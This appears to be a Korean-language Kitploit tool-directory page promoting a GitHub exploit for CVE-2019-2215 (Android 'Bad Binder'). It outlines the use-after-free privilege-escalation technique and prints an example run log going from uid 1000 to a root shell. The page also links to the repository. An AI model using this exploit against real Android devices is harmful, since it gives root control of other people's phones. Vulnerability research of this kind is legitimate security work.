Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-2215 — 초기 Google Pixel 휴대폰에서 발견된 Android 취약점 Bad Binder에 대한 완전한 익스플로잇 | Kitploit
도구/GitHubGitHub/wired0ut/cve-2019-2215
Android SecurityPrivilege EscalationVulnerability AnalysisExploitationMobile SecurityBinary Exploitation
GitHubwired0ut/cve-2019-2215

CVE-2019-2215

초기 Google Pixel 휴대폰에서 발견된 Android 취약점 Bad Binder에 대한 완전한 익스플로잇

저장소 보기
413개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2019-2215

@wired0ut가 작성한 Android의 Bad Binder 취약점에 대한 익스플로잇입니다. UAF를 악용하여 task_struct를 유출한 다음 addr_limit를 덮어쓰고 cred의 id 블록을 덮어써 권한을 상승시킵니다.

연구 및 익스플로잇의 전체 과정은 여기에서 확인할 수 있습니다 (3부작).

goldfish Android 커널(arm64) 버전 4.14에서 패치가 재적용된 상태로 테스트되었습니다.

실행 예:

root@kitploit:~
~ $ whoami
whoami: unknown uid 1000
~ $ ./poc
[!] Starting first phase of exploit; task_struct leak...
[!] Created `binder_thread` and `binder_proc`...
[!] Added wait of binder_thread to `epoll_entry`...
[!] Filling pipes to block...
[!] Filling the iovecs to be overwritten...
[!] Entering blocked state...
[!] Triggering UAF...
[!] Left blocked state, it means we have signaled to not hang.
[*] Leaked task_struct @ 0xffffffc0fb3f0d80
[*] Successfully leaked task_struct ptr, now overwriting addr_limit...
[!] Pre-writing 1 byte to socket to advance iovec iterator to 12th...
[!] Created `binder_thread` and `binder_proc`...
[!] Added wait of binder_thread to `epoll_entry`...
[!] Creating msghdr with crafted iovecs...
[!] Entering recvmsg(...), should block until UAF...
[!] Triggering UAF...
[!] Overwriting addr_limit @ 0xffffffc0fb3f0d88 with 0xfffffffffffffffe
[*] addr_limit overwritten, leaking cred ptr @ 0xffffffc0fb3f1440
[*] cred_ptr @ 0xffffffc0fa45a300
[*] Overwriting entire id block in cred from 0xffffffc0fa45a304 to 0xffffffc0fa45a324
[*] You should now be r00t...
[*] getuid(): 0
[*] w00t w00t
/bin/sh: can't access tty; job control turned off
/ # whoami
whoami: unknown uid 0

추가 정보나 문의 사항이 있으면 연락 주시기 바랍니다.

도구 다운로드